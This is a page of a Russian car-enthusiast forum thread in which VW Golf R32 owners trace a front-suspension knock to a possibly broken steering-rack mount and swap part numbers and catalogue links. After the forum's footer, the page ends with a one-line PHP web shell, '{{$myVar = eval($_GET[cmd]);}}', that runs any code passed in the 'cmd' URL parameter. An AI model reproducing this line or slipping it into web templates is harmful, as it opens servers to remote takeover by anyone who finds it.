+ Ответить в теме
Страница 2 из 8 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя
Показано с 11 по 20 из 77

Тема: стучит пдвеск((


  1. #11
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от M3f Посмотреть сообщение
    Тогда я пошел уничтожать себя этой мыслью.
    Правильно! Никому не отдавай!!!!! ))))
    Остается только распечатать сообщение нового владельца выше и повесить на рабочий стол )))))

    Добавлено через 10 минут
    Я знаю все это из-за чего !
    Вот бывший владелец этой R конкретно нагружает передок:
    http://gti-club.ru/forum/showpost.ph...&postcount=996
    Последний раз редактировалось BON; 03.02.2013 в 15:57. Причина: Добавлено сообщение
    песок сыпется....не останавливайтесь на достигнутом !

  2. #12
    GTI-Racing prop's is on a distinguished road Аватар для prop's
    Регистрация
    06.03.2012
    Откуда
    Москва
    Машина
    R32
    Сообщений
    27
    +1 к проблеме! Поменяно все в подвеске. Аморты полностью с опорой, стаб, сайленты перед+зад, рулевые тяги + наконечники + шаровой шарнир, тяги стаба. Что делать не знаю... рулевая рейка? Буду менять сайленты на RSочные и ставить пластины под подрамник. Куда хоть смотреть еще?? И о каком валу идет речь поделитесь пож? Рейка постукивает на холодную, но я так полагаю что это у всех. Характер стука - особенно выразительно на торможении по неровностям типо трамвайной брусчатки. Выручайте братцы. Тож V R32 кстати

  3. #13
    GTI-Racing M3f has a spectacular aura about M3f has a spectacular aura about Аватар для M3f
    Регистрация
    07.10.2010
    Откуда
    Москва
    Машина
    R32 mk5
    Сообщений
    381
    Цитата Сообщение от BON Посмотреть сообщение
    Остается только распечатать сообщение нового владельца выше и повесить на рабочий стол )))))

    Добавлено через 10 минут
    Я знаю все это из-за чего !
    Вот бывший владелец этой R конкретно нагружает передок:
    http://gti-club.ru/forum/showpost.ph...&postcount=996
    хахах)))) Это не я, если ЧО)))))))
    Не, Олег. В мануале к авто написано - так можно, там же с завода идут пружины ашэр и билли)))) Немцы не против того, чтоб заночевать на капоте)))))

  4. #14
    GTI-Racing R-ка is on a distinguished road Аватар для R-ка
    Регистрация
    25.11.2012
    Откуда
    Москва
    Машина
    Golf 5 R32
    Сообщений
    75
    Цитата Сообщение от prop's Посмотреть сообщение
    +1 к проблеме! Поменяно все в подвеске. Аморты полностью с опорой, стаб, сайленты перед+зад, рулевые тяги + наконечники + шаровой шарнир, тяги стаба. Что делать не знаю... рулевая рейка? Буду менять сайленты на RSочные и ставить пластины под подрамник. Куда хоть смотреть еще?? И о каком валу идет речь поделитесь пож? Рейка постукивает на холодную, но я так полагаю что это у всех. Характер стука - особенно выразительно на торможении по неровностям типо трамвайной брусчатки. Выручайте братцы. Тож V R32 кстати
    разговаривал с ребятами из Imagine а в часности с eXtreeM, и поведал он мне про сеат, примерно с такой же проблемой, стуки на трамвайке. у сеата была оторвано одно крепление рейки и она стучала правдо установить это смогли только кода оторвалось второе крепление... вот теперь в субботу поеду, будем все досконально смотреть, скорей всего это она... как только разберусь, отпишусь... а так то же все поменено и все живое)))

  5. #15
    GTI-Racing prop's is on a distinguished road Аватар для prop's
    Регистрация
    06.03.2012
    Откуда
    Москва
    Машина
    R32
    Сообщений
    27
    Цитата Сообщение от R-ка Посмотреть сообщение
    разговаривал с ребятами из Imagine а в часности с eXtreeM, и поведал он мне про сеат, примерно с такой же проблемой, стуки на трамвайке. у сеата была оторвано одно крепление рейки и она стучала правдо установить это смогли только кода оторвалось второе крепление... вот теперь в субботу поеду, будем все досконально смотреть, скорей всего это она... как только разберусь, отпишусь... а так то же все поменено и все живое)))
    ок! Буду ждать с нетерпением приговора) Есть у меня такое же потайное чувство что и у меня эта проблема. На скок я понят рейки 2го и 3го поколения отличаются как раз креплениями

  6. #16
    GTI-Racing R-ка is on a distinguished road Аватар для R-ка
    Регистрация
    25.11.2012
    Откуда
    Москва
    Машина
    Golf 5 R32
    Сообщений
    75
    Цитата Сообщение от prop's Посмотреть сообщение
    ок! Буду ждать с нетерпением приговора) Есть у меня такое же потайное чувство что и у меня эта проблема. На скок я понят рейки 2го и 3го поколения отличаются как раз креплениями
    тут врать не буду хрен его знает)))

  7. #17
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    вот вам разница реек 2ого поколения и 3его: http://www.elcats.ru/fullinfo.aspx?f...0&pid=229067E2
    кстати судя по каталогам, для реек 2ого поколения существует ремкомплект крпежный 1K0 498 884
    http://www.exist.ru/price.aspx?pid=E...Cat=Volkswagen
    Последний раз редактировалось Grisha; 25.02.2013 в 19:21.

  8. #18
    GTI-Racing R-ка is on a distinguished road Аватар для R-ка
    Регистрация
    25.11.2012
    Откуда
    Москва
    Машина
    Golf 5 R32
    Сообщений
    75
    там рем комплект рулевого механизма) а крепежи насколько я знаю можно только попробовать приварить, но там метал пористый так что только замена, или калхозить что-то((( ладно в суб я надеюсь все ясно станет))

  9. #19
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    Цитата Сообщение от R-ка Посмотреть сообщение
    там рем комплект рулевого механизма) а крепежи насколько я знаю можно только попробовать приварить, но там метал пористый так что только замена, или калхозить что-то((( ладно в суб я надеюсь все ясно станет))
    не читай тупой перевод экзиста
    ремкомплект должен состоять из сайлент-блоков рейки и скобы металлической которая ее крепит.

  10. #20
    GTI-Racing R-ка is on a distinguished road Аватар для R-ка
    Регистрация
    25.11.2012
    Откуда
    Москва
    Машина
    Golf 5 R32
    Сообщений
    75
    Цитата Сообщение от Grisha Посмотреть сообщение
    не читай тупой перевод экзиста
    ремкомплект должен состоять из сайлент-блоков рейки и скобы металлической которая ее крепит.
    тогда может и подойдет)) пасибо за инфу)

+ Ответить в теме
Страница 2 из 8 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя

Похожие темы

  1. Стучит
    от KnowWhatsCool в разделе Украина
    Ответов: 7
    Последнее сообщение: 28.11.2011, 16:15
  2. Что то стучит при троганьи
    от Grisha в разделе Двигатель
    Ответов: 12
    Последнее сообщение: 29.01.2010, 21:57
  3. Кручу руль-стучит в коробку.
    от Bubinskiy в разделе Украина
    Ответов: 54
    Последнее сообщение: 20.01.2010, 23:47
  4. VW Lupo 1.4 АКПП СТУЧИТ И ДЕРГАЕТСЯ! ПОМОГИТЕ
    от kulik в разделе Двигатель
    Ответов: 2
    Последнее сообщение: 09.01.2008, 23:34

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}